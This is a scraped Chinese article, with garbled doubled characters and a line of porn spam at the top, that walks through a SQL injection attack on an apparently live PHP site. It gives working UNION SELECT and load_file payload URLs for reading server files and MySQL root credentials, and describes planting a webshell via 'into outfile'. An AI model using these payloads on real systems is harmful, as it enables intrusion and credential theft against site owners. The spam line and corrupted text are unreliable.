欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

Php網(wǎng)站的腳本注入漏洞實(shí)例檢測(cè)(圖)

互聯(lián)網(wǎng)   發(fā)布時(shí)間:2008-10-08 19:36:24   作者:佚名   我要評(píng)論
下面我們來看一下php注入的過程。 因?yàn)槭蔷W(wǎng)絡(luò)上的主機(jī),這里僅作注入測(cè)試,不作進(jìn)一步的具體操作。我們首先在網(wǎng)站后面加個(gè)單引號(hào)字符,返回錯(cuò)誤信息,證明該網(wǎng)站有可能存在注入。再提交 and 1=1 正常顯示,提交and 1=2顯示錯(cuò)誤,好,繼續(xù)提交union注入語句。http://w
下面我們來看一下php注入的過程。

因?yàn)槭蔷W(wǎng)絡(luò)上的主機(jī),這里僅作注入測(cè)試,不作進(jìn)一步的具體操作。我們首先在網(wǎng)站后面加個(gè)單引號(hào)字符,返回錯(cuò)誤信息,證明該網(wǎng)站有可能存在注入。再提交 and 1=1 正常顯示,提交and 1=2顯示錯(cuò)誤,好,繼續(xù)提交union注入語句。http://www.xxx.net/view_datail.php?id=357 and 1=1 union select 1 同樣顯示錯(cuò)誤信息。但網(wǎng)站路徑我們可以知道,并且是一臺(tái)linux系統(tǒng)/home/caiqing/www/view_detail.php繼續(xù)提交
http://www.xxx.net/view_datail.php?id=357 and 1=1 union select 1,2直到網(wǎng)站正常顯示時(shí)為http://www.xxx.net/view_datail.php?id=357 and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11 這時(shí)再輸入http://www.xxx.net/view_datail.php?id=357 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11時(shí)出現(xiàn)如圖顯示:

圖片中出現(xiàn)數(shù)字3,5,8,9,7等數(shù)字,我們?cè)賹?duì)照一下原網(wǎng)頁(yè)就清楚了,可以看到在前面一圖中的數(shù)字3,5,7處為字符型,我們可以采用load_file語句來顯示網(wǎng)站中的源代碼,我們可以順利地拿到mysql的帳號(hào)和密碼。
接下來將/home/caiqing/www/view_detail.php轉(zhuǎn)化為ascii后為:char(47,104,111,109,101,47,99,97,105,113,105,110,103,47,119,119,119,47,118,105,101,119,95,100,101,116,97,105,108,46,112 ,104,112)采用load_file的方式加在數(shù)字7處,如下:
http://www.xxx.net/view_datail.php?id=357 and 1=2 union select 1,2,3,4,5,6,load_file(char(47,104,111,109,101,47,99,97,105,113,105,110,103,47,119,119,119,47,118,105,101,119,95,100,101,116,97,105,108,46,112 ,104,112)),8,9,10,11
如圖:

我們看到有一個(gè)config.php可能就是數(shù)據(jù)庫(kù)配置文件了,我們?cè)儆猛瑯拥姆绞斤@示出來這個(gè)網(wǎng)站的數(shù)據(jù)庫(kù)配置文件,最后取得mysql的帳號(hào)和密碼,還是root權(quán)限的,我們可以直接采用上面所說的創(chuàng)建一個(gè)表,加入一句話?cǎi)R,再用select * from rose into outfile "/home/caiqing/www/shelll.php ";得到一個(gè)webshell。也可以利用數(shù)據(jù)表中的用戶表在url中執(zhí)行select語句并將管理員用戶名和密碼顯示在數(shù)字3和5中,介于我們這里只是作技術(shù)分析,不詳解。

相關(guān)文章

最新評(píng)論